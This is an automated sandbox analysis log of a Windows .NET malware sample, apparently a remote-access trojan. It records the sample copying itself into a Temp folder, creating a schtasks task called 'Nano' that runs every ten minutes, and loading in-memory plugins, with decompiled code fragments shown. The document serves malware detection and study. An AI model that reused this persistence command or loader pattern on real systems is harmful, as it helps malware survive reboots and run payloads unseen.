              Source: C:\Users\user\Desktop\fresh_shrunk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fresh_shrunk.exeReversingLabs: Detection: 55%
              Source: unknownProcess created: C:\Users\user\Desktop\fresh_shrunk.exe "C:\Users\user\Desktop\fresh_shrunk.exe"
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /fJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: fresh_shrunk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: fresh_shrunk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DD63AC push dword ptr [ecx+ecx-75h]; iretd 1_2_02DD63BB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DD20D0 push esp; iretd 1_2_02DD20D1
              Source: fresh_shrunk.exeStatic PE information: section name: .text entropy: 7.228149219206704
              Source: bddddsx.exe.7.drStatic PE information: section name: .text entropy: 7.228149219206704
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fresh_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
